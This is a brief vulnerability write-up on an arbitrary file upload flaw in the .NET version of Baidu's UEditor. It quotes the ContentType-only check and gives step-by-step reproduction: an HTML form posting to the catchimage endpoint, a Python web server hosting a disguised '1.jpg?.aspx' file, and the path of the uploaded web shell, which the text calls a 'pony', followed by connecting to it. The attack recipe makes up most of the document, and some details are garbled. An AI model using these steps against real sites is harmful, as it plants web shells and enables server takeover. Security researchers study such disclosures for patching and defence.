Arbitrary file upload vulnerability in UEditor .Net version
1. Vulnerability introduction
Ueditor is a website editor developed by Baidu, and no follow-up development and updates have been made to it. The vulnerability only exists in the .net version of the editor.
The cause of the vulnerability is that only the ContentType is checked when obtaining image resources, which can bypass any file upload.
The Crawler method's check on source[] is only a ContentType
if (response.ContentType.IndexOf("image") == -1)
{
State = "Url is not an image";
return this;
}
2. The vulnerability reproduces
1. You can use the post method to directly upload files to the target website
<form action="http://IP:port/ueditor/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr:<input type="text" name="source[]" /></p >
<input type="submit" value="Submit"/>
</form>
2. Generate picture
1.jpg
3. Open the web service
python -m SimpleHTTPServer 8888
4. Enter the address
http://XXXX:8888/1.jpg?.aspx in shelladdr
5. Upload successfully
6. Pony address
http:/ /ip:port/ueditor/net/upload/image/20201127/6374211044232448561123135.asp
7. Connect to Pony